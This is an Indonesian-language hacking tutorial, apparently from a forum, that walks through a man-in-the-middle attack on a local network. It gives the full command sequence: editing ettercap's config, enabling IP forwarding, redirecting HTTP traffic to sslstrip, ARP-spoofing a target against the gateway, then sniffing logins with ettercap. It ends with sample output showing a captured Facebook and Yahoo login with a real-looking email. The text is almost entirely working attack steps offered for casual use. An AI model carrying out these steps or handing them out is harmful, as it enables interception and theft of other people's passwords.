Saya menggunakan OS Backtrack 4 Final dan aplikasi Ettercap, SSLSTRIP, ARPSpoof,IPTABLES jika belum ada silahkan cari di google n download
Ok langsung aja ke Tekniknya :
1. Kopi Cappucino, Rokok Sampoerna, n Koneksi Jaringan dengan kecepatan 1 Gbp/s :p
2. Edit File /etc/etter.conf
root@bt:~# kwrite /etc/etter.conf
Cari bagian ini
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Kemudian Hilangkan tanda # seperti ini :
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3. Aktifkan IP Forward
echo 1 > /proc/sys/net/ipv4/ip_forward
4. Redirect port 80 ke port 10000 (sslstrip)
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
5. Ok sekarang jalankan ArpSpoofing
Contoh
Target : 192.168.2.105
Gateway : 192.168.2.244
root@bt:~# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244
6. Kemudian Jalankan SSLSTRIP
root@bt:~# sslstrip -a -k -f
7. Ok langkah Terakhir Jalankan ettercap
root@bt:~# ettercap -T -q -i wlan0
Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
root@bt:~# ettercap -T -q -i wlan0
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.63.181.26:80 -> USER: [email]toovix07@yahoo.com[/email] PASS: (rahasia :p) INFO: [url]http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc&v=1.0&next=http://facebook.poker.zynga.com/poker/playa.php?uid=10000119039[/url]
Ok sekian dulu Tutornya, Silahkan dicicipi :p